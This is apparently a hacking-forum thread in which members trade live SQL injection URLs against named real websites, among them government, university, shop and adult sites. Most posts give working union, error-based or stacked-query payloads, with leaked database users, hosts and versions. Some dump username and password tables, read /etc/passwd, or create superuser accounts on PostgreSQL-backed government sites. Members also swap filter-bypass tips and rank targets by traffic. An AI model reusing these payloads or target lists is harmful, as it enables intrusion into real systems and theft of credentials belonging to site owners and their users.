http://www.diario3.com.ar/nota.php?id=-1433+union+select+1,2,concat_ws(0x20,us_id,us_user ,us_pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+f rom+usuario--

satana-fu
19.12.2010, 07:40
http://www.1soveti.ru/page.php?link=-44+union+select+1,group_concat(login,char(58),pass ),3,4,5,6,7,8+from+user--

FindeR
19.12.2010, 18:54
Porn site, mysql.user is open


Code:
http://www.mondolapdance.it/provincia.php?sP=PD%27+or+1=1+union+select+1,2,3,g roup_concat%28TABLE_SCHEMA,%27.%27,TABLE_name%29,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+inform ation_schema.TABLES+where+table_name+like+%27%user %%27+--+

same here


Code:
http://www.annuaire.fille-exhibe.com/Youpornotube-info-1061+union+select+1,2,3,4,5,6,7,8,9,group_concat%2 8distinct%20table_name%20order%20by%20table_name%2 0desc%29,11,12,13,14,15,16,17,18,19,20,21,22+from+ information_schema.tables+--+.php

moodoone
19.12.2010, 22:34
Code:
http://www.dovidkalutsk.com.ua/news_view.php?id=-739+union+select+1,2,3,4,5,6,7,version%28%29,9,10, 11,12+from+userlist--

Konqi
19.12.2010, 23:08
http://www.vard.si/slo/kontinent.php?id=4;select+version()::int,null,null ,null,null,null,null,null,null,null,null,null+from +pg_user--

попугай
20.12.2010, 08:05
http://www.blbg.org.sg/event_detail.php?id=96+union+select+1,2,3,4,5,6,co ncat_ws(0x3a,username,version()),8,9,10,11,12,13,1 4,15,16,17,18,19,20+from+users--

life_glider
21.12.2010, 03:59
view-source:http://www.worldwalk.info/en/catalog/1135%20and%202=1%20union%20select%201000,version%2 8%29,3000,4000,5000,6000,7000,8000,9000,10000,1100 0,12000#/

Seravin
21.12.2010, 20:39
Code:
http://plugring.farmanager.com/category.php?cid=33+and+1=2+union+select+1,2,3,con cat(version(),0x3a,database()),5,6+--+&l=ru

5.0.77 : plugring

KREGI
22.12.2010, 02:03
TIC 10

PR 3


Code:
http://www.printeffect.ru/product.php?tp=1+and+2=0+union%20select%20concat_w s%280x3a,email,password%29+from+users

Chest3r
22.12.2010, 18:32
http://brainattack.ru/articles.php?a_id=-5+union+select+group_concat(u_login,0x3a,u_pass),2 ,3,4+from+tbl_brain_users--

Passwords in plaintext +WMZ

ubi
22.12.2010, 21:16
http://versaledreams.ru/index.php?id=7/**/union/**/select/**/1,2,3,4,5,6,7--

HellFire
23.12.2010, 05:49
Spanish tourism for everyone, guys:


Code:
http://www.alavaturismo.com/es/ficha.php?id=363-1.1+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT( 0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Da tabase(),0x2F2A2A2F,User(),0x7873716C696E6A656E64) ,0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31--

Database Version: 4.1.11-Debian_4sarge8-log

Database name: bd391578

User name: ADM_bd391578@217.116.0.23

...and biology:


Code:
http://www.everythingbio.com/glos/definition.php?ID=-1+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x 7873716C696E6A626567696E,Version(),0x2F2A2A2F,Data base(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0 x71),0x71),3,4,5,6,7,8,9--

Database Version: 5.0.83-log

Database name: everythi_tables

User name: everythi_phpAds@boscgi0603.eigbox.net

FindeR
23.12.2010, 22:48
Code:
http://l2.naturalbornkillers.it/index.php?action=show;type=quest;id=195+union+sele ct+version%28%29+--+

Output in the title; SMF version 2 is installed there too (so you don't have to hunt for table names).

Admin:


Code:
/// dell

JohnnyBGoode
23.12.2010, 23:25
http://www.nds-sochi.ru/article.php?id=-23008+union+select+1,2,concat_ws(0x3a,version(),us er(),database()),4,5+--+

5.0.90:u10270@78.108.81.111:b10270

http://sensation.ntv.ru/archive.jsp?iid=71731+and+to_char(11)=to_char(1)|| to_char(1)+--+

http://sensation.ntv.ru/archive.jsp?iid=71731+and+to_char(11)=to_char(1)|| to_char(0)+--+

Looks like blind Oracle here. No idea how to take it further.

Seravin
24.12.2010, 00:58
Code:
http://wincmd.ru/user/1391063'+and+1=2+union+select+1,2,3,concat(user(), 0x3a,version(),0x3a,database()),5,6,7+--+'.html

wincmd_feinx@localhost : 4.1.22-standard : wincmd_db

Ы_ы

BaleHoK
24.12.2010, 02:06
www.hardsextube.com/share.php?vid=-199646+or 1=0+UNION SELECT 1,file_priv,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,5 1,52,53,54,55,56 from mysql.user--

AR 255 many many traff

FindeR
24.12.2010, 21:09
Code:
http://www.kasting.ru/library/show_user_photo.php?photo_id=1175260000+union+sele ct+1,2,3,version(),4+--+&uid=31853

5.1.49-Max-log

users - u_main (log and pw are the user and password). Everything is in plaintext, but generated by the site.

There's a dating site on the subdomain, can dig there too - http://love.kasting.ru

Ponchik
25.12.2010, 00:14
http://scores.crazymonkeygames.com/hs/listscores.php?id=-1+UNION+SELECT+concat_ws(0x3a,USER(),DATABASE(),VE RSION()),2,3,4,5+FROM+information_schema.tables--

Today's crazymon_hs@cmgn-n2-int:crazymon_highscores:5.0.27-standard High Scores

well, you get it, output in the title

eclipse
25.12.2010, 10:51
Code:
http://www.designarkivet.se/index.php?pageid=123%27%20AND%201=0%20union+select +1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,concat_ws%280x3a,version%28%29,user%28%29,dat abase%28%29%29,23,24,25,26,27,28,29,30,31+--+

MySQL version 4.1.22-community-nt

Username cms@localhost

Database name cms_designarkivet

hakrat
25.12.2010, 14:39
http://iw-shop.ru/index.php?ukey=news&blog_id=(select+1+from+(select+count(0),concat((se lect+version()),floor(rand(0)*2))+from+SC_news_tab le+group+by+2+limit+1)a)--+

good.god
25.12.2010, 22:18
Code:
http://www.ogm-bodyboard-shop.com/bodyboard_shop.php?num=1-999.9+union+select+1,2,3,4--

version 5.0.90-log

db ogmbodyb002@10.0.63.124

name ogmbodyb002

Hack_ERR++
25.12.2010, 23:15
Code:
http://cps.softex.br/noticia_interna.php?id=-1433+union+select+1,2,3,4,5,6,7,8,concat_ws(0x20,i d,email,login,senha),10,11,12,13,14,15,16,17+from+ tbUsuarios--

DezMond™
26.12.2010, 20:19
Doesn't seem to be a repost, I checked

msi.com TIC — 1000 PR — 7


Code:
http://ru.msi.com/program/products/vga/vga/pro_vga_detail_new.php?UID=-21149+union+select+1,group_concat(table_name),3,4, 5,6,7,8,9,10,11,12+from+information_schema.tables+ where+table_schema='msi'+--+

Hack_ERR++
27.12.2010, 14:43
Code:
http://www.poroszlo.hu/en/szallas.php?id=-10+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24--
http://inita.hu/references/ref.php?id=-10+union+select+1,table_name,3,4,5,6,7,8+from+info rmation_schema.tables--

satana-fu
28.12.2010, 14:43
http://forsmaster.ru/index.php?id=-53+union+select+1--

Konqi
29.12.2010, 00:29
https://epark.ttu.edu/parking_web/news/news.php?dnf_id=14+union+select+null,to_char(table _name),null,null+from+sys.all_tables

picaso
29.12.2010, 02:09
http://video.rosbalt.ru/channel_detail.php?chid=-29 union select 1,user(),group_concat(email,username,pwd),4,5,6,7, 8,9,10,11,12,13,14,15,16 from signup--+7

Konqi
29.12.2010, 18:34
http://www.khanscope.com/productdetails.cfm?productID=1194+or+1+group+by+co ncat(version(),floor(rand(0)*2))having+min(0)+or+1--

Hack_ERR++
31.12.2010, 12:06
Code:
http://php88.free.fr/bdff/act.php?ID=-2010+union+select+1,2,version(),4--
http://motocykel.sk/clanok.php?id=-2010+union+select+1,version(),3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18--

eclipse
01.01.2011, 00:56
http://www.raonsims.com/item/detail.php?num=-1+union+select+1,2,3,4,5,6,7,8,9+--+


Path to the script location:

/home/hosting_users/skysj48/www/item/detail.php

MySQL Version: 4.0.22-log

Database Name: skysj48

Username: skysj48@localhost

JOSSe7
02.01.2011, 04:14
Code:
http://www.hammer-marcopolo.de/links/links.php?cat_id=-47+and+1=0++and+1=0++and+1=0+=null=null+Union+Sele ct+1,2,3,4,5,6,7,0x4861636B656420627920494E432E,9, 10,11,12,13,14,15,16,17,18--

Hack_ERR++
02.01.2011, 17:27
Code:
http://www.rek.ee/eng/ettevote.php?id=32+and+substring(version(),1,1)=5

// http://www.rek.ee/eng/ettevote.php?id=32+and+1=0+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31

eclipse
02.01.2011, 20:44
http://www.elephant.se/location2.php?location_id=1%27%20union%20select%20 1,2,3,concat_ws%28%27:%27,version%28%29,user%28%29 ,database%28%29%29,5,6,7,8,9,10--+


5.0.51a-24+lenny4-log

elephant_se@srv8.one.com

elephant_se

good.god
02.01.2011, 23:43
Code:
http://www.indiacon.com/businesscards.php?Id=1-2.1+union+select+1,2,3,group_concat(table_name),5, 6,7,8,9,10,11,12,13+from+information_schema.tables--

5.0.91-community-log

indiacon@localhost

indiacon

DeepBlue7
03.01.2011, 03:20
Code:
http://www.lokomotive.lv/index.php?cat=1&subrubid=1378+and+1=0+union+select+1,2,3,concat_ws (0x2f,version(),user(),database()),5,6,7,8,9,10,11

Version : 5.0.75-0ubuntu10.05-log

user : vagels@localhost

db : vagels

JOSSe7
04.01.2011, 09:57
Code:
http://www.gamesmarket.com.au/info.php?type=90+and+0+union+select+1,2,concat_ws% 280x3a,user%28%29,database%28%29,version%28%29%29, 4,5,6--+



vs80127_1_dbo[@]bne2-0030dp.server-web.com:vs80127_1:4.0.24-nt-max-log

good.god
06.01.2011, 23:17
Code:
http://www.suncellular.com.ph/phone_detail.php?id=-79+union+select+1,group_concat(table_name),3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32+from+information_schema. tables+--+

5.0.91-community

suncell@localhost

suncellular

The auths table has user and pass fields, but I can't pull them out; maybe there's no access to the table.

eclipse
07.01.2011, 00:11
PR -5

Database name: db_hospiz

Database version: MySQL 4.1.10a-Max-log

Database username: cl_hospiz@localhost

Exploit:


Code:
http://www.deutscher-kinderhospizverein.de/42_ambulante_einzel_wir.php?id=-1+union+select+1,2,3,4,5,aes_decrypt(aes_encrypt(c oncat_ws(' ; ',DATABASE(),USER(),VERSION()),0x71),0x71),7+--+

PR -4

Database name: DB325512

Database version: MySQL 5.0.91-log

Database username: U325512@bignurker.st

Exploit:


Code:
http://www.genuin.de/en/04_d.php?k=-1%27+union+select+1,user%28%29,group_concat%28tabl e_name%29,4,5,database%28%29,version%28%29,8,9,10, 11,12+from+information_schema.tables+--+

kamaz
07.01.2011, 00:17
good.god said:
The auths table has user and pass fields, but I can't pull them out; maybe there's no access to the table.




Code:
http://www.suncellular.com.ph/phone_detail.php?id=-79+union+select+1,concat(user,0x3a,pass),3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32+from+cphulkd.auths limit 1+--+

Well, it seems to work just fine ^_^

Hack_ERR++
07.01.2011, 17:47
Code:
http://kalakkalcinema.com/tamil_detail.php?id=-323+union+select+1,2,3,group_concat(column_name),5 ,6,7,8,9,10,11,12,13,14+from+information_schema.co lumns+where+table_name=0x74626c5f61646d696e--
http://www.verdammnis.com/pictures.php?id=-323+union+select+1,unhex(hex(table_name)),3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33+from+information_schem a.tables--
http://www.pesic.name/slika.php?id=-323+union+select+1,2,3,table_name,5,6,7,8,9,10+fro m+information_schema.tables--

Konqi
07.01.2011, 19:59
http://www.thecommunitylibrary.org/calendar.php?cID=55+and+length(char(1))!=1+union(s elect+1,2,3,4,5,6,7)

good.god
08.01.2011, 00:17
Code:
http://www.supairball.com/site2008/2nd.php?n=9-1+union+select+1,concat_ws('%20;%20',database(),us er(),version()),group_concat(table_name),4,5,6,7,8 ,9+from+information_schema.tables--

supairball

supairball@wtc40.zarcrom.net

5.0.67-0ubuntu6-log


Code:
http://www.salasbingo.com/en/casino.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+

5.0.91-log

winzingo

winzingo@173.201.216.78

As far as I can tell, union gets filtered when information_schema.tables is used; I couldn't get around it. By simple guessing I seem to have come across the users table, namely w.user, but it says something like no rights to read this table (I may be wrong). All of this is about the last one...

look2009
08.01.2011, 04:22
http://www.mattmo.nl/detail.php?project=125/**/union/**/select/**/USER(),2,3--

root@localhost

5.0.45-log

mattmo

---------

http://www.travelersjournal.com/articles2.php?ID=233/**/union/**/select/**/1,USER(),DATABASE(),4,VERSION(),6,7--

travjourn

travjourn@localhost

4.1.22

S[N]EP
08.01.2011, 15:03
Code:
http://www.smokycarrot.com/index.php?rubID=0+union +select+1,2,3,version(),5,6,7 ,8,9,10,11,12,13,14,15--

Version - 5.0.67-log

User - smokycarrot@imu116.infomaniak.ch

Database - smokycarrotcom

Unknown
09.01.2011, 02:03
http://www.newacropol.ru/na/russia/entry/?id=-1088%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12 ,13,14,concat_ws(0x3a,cal_login,cal_passwd),16,17, 18,19,20%20from%20afisha.webcal_user%20limit%200,1--

Version - 5.0.67

Database - afisha

TIC400 PR5

eclipse
10.01.2011, 16:23
PR -4

Database name: shropshi_sccc

Database version: 5.0.89-community

Database username: shropshi_sccc@localhost

Exploit:


Code:
http://www.shropshireccc.co.uk/newsarticle.php?ID='+union+select+1,concat_ws('~', id,username,password),null,4,null,6+from+als3_user s+--+

PR -2

Database name: heidi

Database version: MySQL 4.1.20

Database username: heidi_f@localhost

Exploit:


Code:
http://www.chinahiking.cn/hike.php?r=-1+union+select+1,2,3,4,5,6

wwwROOT
10.01.2011, 18:00
cy 10

pr 1

espetsmash_cu@localhost

espetsmash_cu

5.0.77


Code:
http://eshop-spetsmash.kiev.ua/index.php?w=article&lang=ru&id=-3%20union%20select%201,VERSION%28%29,USER%28%29,DA TABASE%28%29,5

information_schema is accessible

good.god
10.01.2011, 21:20
Code:
http://ww.sexshop.com.pl/en/zamow.php?id=-1+union+select+1,version(),3,4,5,database(),user() ,8,9,10,11,12,13+--+

5.0.91-log

hipermedia

hipermedia@localhost


Code:
http://www.f1shop.ru/goods2.php?num=-1+union+select+1,version(),3,4,5,6,7,8,database(), user(),11,12+--+

5.0.90

u89072@78.108.84.101

b89072_f1shop

Konqi
11.01.2011, 01:40
http://www.designtrust.com/english/document_2.php?did=67+or+1+group+by+concat(version (),floor(rand(0)*2))having+min(0)+or+1--

http://www.cursodepintura.com.br/?c=Id%C3%A9ias&n=5118+and+1=(select+version()::int+from+pg_user)

http://www.acmeunited.com/acme_west/index.php?did=1796+or+1+group+by+concat((select+co ncat_ws(0x3a,username,password)+from+cms_users+lim it+2,1),floor(rand(0)*2))having+min(0)+or+1--&sname=Products

BaleHoK
11.01.2011, 01:46
pornoxo.com/templates/related.php?c=0&id=-13719+or+1=0+union select 1,version()--

Running on version 5

Mr.Br0wn
11.01.2011, 08:01
http://www.cretonnerre.be/news/comment.php?id=126+and+1=0+union+select+1,2,3,4,co ncat_ws(0x3a,version(),user(),database())--

Version: 5.0.51a-24+lenny4-log

User: cretonnerre@localhost

Database: cretonnerre

http://www.cretonnerre.be/admin/

good.god
11.01.2011, 17:51
Code:
http://www.zrelishe.ru/module/kino/view_film.php?id=-1+union+select+1,group_concat(name,0x3a,password), 3,4,5,6,7,concat_ws(0x3a3a,user(),version(),databa se()),9,10,11,12,13,14,15+from+frb_users+--+

zrelishe@localhost

5.1.35-log

zrelishe


Code:
http://nicecasino.net/index.php?id=16-999.9+union+select+1,2,concat_ws(0x3a,version(),da tabase(),user()),4,5,6,7,8,9,10,11+--+

5.0.91-log

petermol_lz

petermol@grid04.agnat.pl

Dr..VATSON
13.01.2011, 02:51
http://www.arashido.com/calendar.php?id=-171+union+select+1,concat_ws(0x3a,adminUserName,ad minPassword),3,4+FROM+config%20--

http://www.arashido.com/login.php

LiRvD082
13.01.2011, 12:44
Haven't been here in a while

http://rusuper.ru/objs/view1.php?id_city=30&id_obj=-3251+UNION+SELECT+1,2,3,group_concat(unhex(hex(col umn_name))),5,6,7,8,9+FROM+INFORMATION_SCHEMA.colu mns+where+table_name=0x7573657273--

LiRvD082
13.01.2011, 12:46
And a couple more:

http://avon.co.in/productdetails.php?pid=-99+UNION+SELECT+1,2,login,4,5,6,7,8,9,10,password, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29+FROM+admin--

http://990909.ru/index.php

?podrobno=-16+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,GROUP_CONCAT(COLUMN_NAME),35,36,37,38,39,40, 41,42,43,44,45,46,47+FROM+INFORMATION_SCHEMA.COLUM NS+WHERE+TABLE_NAME=0x61646d696e--

http://www.magnifix.co.nz/magnifix/showproduct.php

?id=24+UNION+SELECT+version(),1,2,3/*

Onkelz
13.01.2011, 14:37
You think you're so clever that you can post SQLi on two forums at once?

This is the last warning: don't do that, all the posts will be deleted anyway.

//Angry mod!

S[N]EP
13.01.2011, 17:14
Code:
http://autoob.ru/avtomobil/view.php?id=0+union+select+1,2,3,4,5,6,7,8,9,10,11 ,concat_ ws(0x3a,version(),user(),database()),13,14,15

Version: 5.0.77-log

User: eresik_autoob@localhost

Database: eresik_autoob

-----


Code:
http://rusuper.ru/index1.php?id_city=-20+union+select+1,conc at_ws(0x3a,version(),user(),database()),3,4

Version: 5.0.77-log

User: eresik_rusuper@localhost

Database: eresik_rusuper

P.S. I saw that this site has already been posted here, but the vulnerability is on a different page, so I guess it can stay?)

nemaniak
13.01.2011, 23:02
www.newmp.org.uk PR-5


Code:
http://www.newmp.org.uk/article.php?categoryid=100&articleid=-1692+union+select+1,2,3,4,5,6,7,8,9,0,concat_ws(0x 3a,version(),user(),database()),12+--+



Code:
5.0.77:newmp@localhost:newmp


www.blizzard.com.ua


Code:
http://www.blizzard.com.ua/article.php?id=-142+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7,8+--+



Code:
5.0.77:blizzard@localhost:db_blizzard

S[N]EP
14.01.2011, 01:05
Code:
http://moreprom.ru/article.php?id=-1+union+select+1,concat_ ws(0x3a,version(),user(),database()),3

Version: 5.1.34

User: alo_moreprom@192.168.1.15

Database: alo_moreprom

------


Code:
http://www.dzogchenlineage.ru/modules/publication/article.php?id=40+union+select+1,concat_ ws(0x3a,version(),user(),database()),3,4,5,6,7,8

Version: 5.1.41-log

User: shrisingha_mysql@10.1.162.25

Database: shrisingha_db

-----

PR-4 For some reason I think an include can be done here, but I don't know how


Code:
http://www.artveras.com/page.php?rubID=-60+union+select+1,2,3,4,5,6,7,8,9,10,concat_w s(0x3a,version(),user(),database()),12,13,14,15,16--

Version: 5.0.67-log

User: monolocoart@imu122.infomaniak.ch

Database: artverasch

S[N]EP
14.01.2011, 23:39
and a few more SQLi

www.sonnmatten.ch


Code:
http://www.sonnmatten.ch/page.php?rubID=-11+union+select+1,2,3,concat_ ws(0x3a,version(),user(),database()),5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20--

Version:4.1.20

User:sonnmatten@localhost

Database:sonnmatten1

---

www.geneuro.com


Code:
http://www.geneuro.com/index2.php?rubID=-5+union+select+1,2,3,4,concat_ ws(0x3a,version(),user(),database()),6,7,8,9,10,11 ,12,13,14,15--

Version:5.0.77

User:ad12343@localhost

Database:db12343_geneuro

---

www.klass-electronics.com


Code:
http://www.klass-electronics.com/shop/lire/index.php?rubid=-8+union+select+1,2,3,concat_ ws(0x3a,version(),user(),database()),5,6,7,8--

Version:4.0.25-standard-log

User:klassele@10.0.75.168

Database:klassele

---

www.pick-et-boch.com


Code:
http://www.pick-et-boch.com/anglais/showrub.php?rubid=-5+union+select+1,2,3,4,5,concat_ ws(0x3a,version(),user(),database()),7,8,9--

Version:5.0.51a-24+lenny4-log

User:umigonda@ht10.idep.us

Database: pich

---

www.bolleboosje.be


Code:
http://www.bolleboosje.be/shop/index.php?rubId=-1+union+select+1,concat_ ws(0x3a,version(),user(),database()),3

Version:5.0.91-community

User:bolleboo@localhost

Database:bolleboo_menhir

---

www.make-a-wish.ch PR-5


Code:
http://www.make-a-wish.ch/index.php?rubID=-10+union+select+1,2,3,concat_ ws(0x3a,version(),user(),database()),5,6,7,8,9,10, 11,12,13,14,15,16,17--

Version:5.0.84-log

User:monolocomaw@imu94.infomaniak.ch

Database:make-a-wishch

---

www.ariellavillas.com


Code:
http://www.ariellavillas.com/page.php?rubID=2&lan=es&villaID=-73+union+select+1,2,3,concat_ ws(0x3a,version(),user(),database()),5,6,7,8,9,10, 11,12,13,14,15,16,17,18--

Version:5.0.67-log

User:ariellasvillas@imu148.infomaniak.ch

Database:ariellasvillascom

---

www.hibiscus-design.fr


Code:
http://www.hibiscus-design.fr/shop/lire/index.php?rubid=-64+union+select+1,2,3,concat_ ws(0x3a,version(),user(),database()),5,6,7,8--

Version:5.1.41-3ubuntu12

User:hibiscusdesignfr@88.190.253.56

Database:hibiscusdesignfr

DezMond™
15.01.2011, 02:59
contratacionesune.une.com.co


Code:
http://contratacionesune.une.com.co/detalle-contrato.php?id=100024+union+select+1,table_name,3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32+from+information_s chema.tables+--+



Code:
http://une.com.co/servicioalcliente/index.php?option=com_formularios&module=solicitudproducto&Itemid=118&uen=1+UnIon+SeLEct+1,2+from+uneprod_tarificadordes arrollo.tblpymes_ciudades+--+

usadba.by TIC20 PR3


Code:
http://www.usadba.by/int_page.php?id_get=-195+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a3 a,ID,USER,PASS),11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55 ,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,7 2,73,74,75,76,77,78,79,80,81,82,83,84,85+from+USER S+--+

bad-segeberg.dlrg.de


Code:
http://bad-segeberg.dlrg.de/termine.html?tx_dlrgterminkalender_pi1%5Baction%5D =read&tx_dlrgterminkalender_pi1%5Btid%5D=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16/**/+be_users+--+&cHash=dae5a5fda1c887ce9ad1f8b8a55f7874

dreamtime.botg.de


Code:
http://dreamtime.botg.de/index.php?id=683&tx_t3primarix_pi1%5BshowUid%5D=30554+union+select+ 1,2,database()+--+&tx_t3primarix_pi1%5Baction%5D=single&tx_t3primarix_pi1%5Blang%5D=CH&tx_t3primarix_pi1%5Bmode%5D=trips&tx_t3primarix_pi1%5Breisetitel%5D=Traumreise%20Tah iti&tx_t3primarix_pi1%5Breiseland%5D=Franz%C3%B6sisch-Polynesien&tx_t3primarix_pi1%5Breiseort%5D=20%20Tage%20Inselk ombination&cHash=2c9892ce3dfb2089b19d51a53fbbb560

jedek-reisen.at


Code:
http://www.jedek-reisen.at/afrika/namibia/unterkuenfte/unterkuenftedetails.html?tx_t3primarix_pi1%5BshowU id%5D=36240'+union+select+LOAD_FILE(0x2F6574632F70 6173737764)+from+mysql.db+--+&tx_t3primarix_pi1%5Baction%5D=single&tx_t3primarix_pi1%5Blang%5D=D&tx_t3primarix_pi1%5Bmode%5D=hotels&tx_t3primarix_pi1%5Breisetitel%5D=Onguma%20Tree%20 Top&cHash=4162bb91d6f2e3de4dc64aff5996a844

www.flick.co.nz


Code:
http://www.flick.co.nz/index.php?page_code=articleHP&article_id=-16+union+select+1,2,3,group_concat(column_name),5, 6+from+information_schema.columns+where+table_name =0x74626C5F726567697374657265645F75736572+--+

good.god
15.01.2011, 10:04
Code:
http://help.sevstar.net/article.php?id=-1+union+select+1,2,3,group_concat(name,0x3a,passwo rd),5,6+from+anime.dle_users+--+

help

help@localhost

5.0.51a-24+lenny4

SEWERN
15.01.2011, 15:30
http://www.pusk12.ru/shop/about.php?id=-7+union+select+1,2,user(),4,5,6,7--

Unknown
16.01.2011, 23:37
http://aging.wisc.edu/research/affil.php?Ident=-67%20union%20select%201,2,concat_ws(0x3a,version() ,user(),database()),4,5,6,7,8,9,10,11,12--

Version - 5.0.22-standard

User - webbyftpuser@localhost

Database - Affil-Train 4

TIC1700 PR8

Konqi
16.01.2011, 23:51
http://www.terracap.df.gov.br/internet/index.php?sccid=35;create user stranger;

http://www.terracap.df.gov.br/internet/index.php?sccid=35;alter user stranger createuser createdb;

http://www.terracap.df.gov.br/internet/index.php?sccid=35;select cast(usename||chr(58)||passwd as int) from pg_shadow;

Unknown
17.01.2011, 01:46
5.0.77-log

http://www.educacion.gov.ec/interna.php?txtCodiInfo=2+and+1=0+union+select+1,2 ,3,4,5,6,7,8,9,10--

AC//DC
18.01.2011, 20:43
http://www.allrussia.ru/cgi-bin/atlas_look.cgi?id=-240%20and%201=2%20union%20select%201,2,concat_ws(0 x3a,version(),user(),database(),@@version_compile_ os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28--

5.0.77:micke@localhost:allrussia:redhat-linux-gnu

Konqi
19.01.2011, 18:33
http://www.dashu-house.gov.tw/bexfront.php?sid=bmddyna&item=detail&class=16&id=138;create user ForsakeR with password $$antichat$$;

http://www.dashu-house.gov.tw/bexfront.php?sid=bmddyna&item=detail&class=16&id=138;alter user ForsakeR superuser;

http://www.dashu-house.gov.tw/bexfront.php?sid=bmddyna&item=detail&class=16&id=138;select cast(usename||chr(58)||passwd as int) from pg_shadow;

Gorev
20.01.2011, 01:37
http://www.bernegger.at/text/text.php?ID=-207+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,vers ion(),database(),user()),9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50, 51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 ,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,8 4,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100 ,101,102+--+

Database Version: 5.0.51a-24+lenny4

Database name: web_bernegger_01

User name: web_bernegger@localhost

Konqi
20.01.2011, 23:37
http://www.rainer.lv/?l=2&m=150&id=1106;create user Depart3r with password $$qwerty$$

http://www.rainer.lv/?l=2&m=150&id=1106;alter user Depart3r superuser;

BaleHoK
20.01.2011, 23:39
A few more from me

All of them have a high AR

www.nuggettube.com/videos/player.php?from=a&id=-1131609+or+1=0+union select 1,2,user(),4,5,6--

v5

blog.entrepreneur.com/contributor-profile.php?author_id=19'+or+1+group+by+concat(ver sion,floor(rand(0)*2))having+min(0)+or+1--+

v5

hunterdonads.nj.com/branding/advance/site_map.php?sfid=3&banner=branding/advance/Hunterdon/banner.jpg&sfid=-3+or+1=0+UNION SELECT 1,2,file_priv,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30 from mysql.user--

v5 + we have file privileges

marketing.allbusiness.com/widgets/termres.php?id=1+or+1=0+union%20select%201,%27asa% 27,3,4,5,6--

v5 :0... the legendary AllBusiness

www.th.boots.com/2009/eng/brands_cat.php?brand_id=-22+or+1=0+union select 1,version(),3,4,5,6--

v5

http://www.sunporno.com/video.php?cc=2&rnd=92&id=-17604/**/or/**/1=0/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,table_name,41/**/from/**/information_schema.tables

v5 + a small filter on %20 ))

good.god
21.01.2011, 13:43
Code:
http://www.whatsonwilmington.com/eventList.php?category_id=1-999.9+union+select+1,2,3,4,5,group_concat(user_log in,0x3a,user_pass)+from+wilmwow.wp_nbhjc0_users

5.1.39-log

wilmwow

wilmwow@tirane.dreamhost.com

Konqi
21.01.2011, 21:20
Legislative Assembly of Rostov Oblast

http://www.zsro.ru/index.php4?mod=nw&news_id=1109+and+1=(select version()::int from pg_user)

// hi bro)

Dare
23.01.2011, 08:06
http://www.africansuccess.org/visuFiche.php?id=-72+union+select+1,2,version(),4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26--+&lang=en

Hi! Konqi )

AC//DC
24.01.2011, 10:40
ttp://www.step1.it/tribu_di_zammu.php?sez=post&id=-37736+union+all+select+0,concat_ws(char(58),@@vers ion,user(),database()),2--

in the title

COOLBOY007
24.01.2011, 18:32
Code:
http://wartegg.ch/kultur.php?do=detail&id=-238+union+select+1,2,3,4,version(),6,user(),8,9,10 ,11,12,13,14,15+--+

Google PR 4

TIC 10

Unknown
24.01.2011, 22:07
Legislative Assembly of Irkutsk Oblast

http://old.irk.gov.ru/index.php?resultpage=2&IdAction=docs&Event=section&id=51%20and%20substring(@@version,1,1)=4

Legislative Assembly of Perm Krai

http://www.parliament.perm.ru/meeting/index.php?ID=87&ID2=-125%20union%20select%201,2,concat_ws(0x3a,user(),v ersion(),database()),4,5,6,7,8,9,10,11,12,13,14,15 ,16--

Comrad777
25.01.2011, 00:51
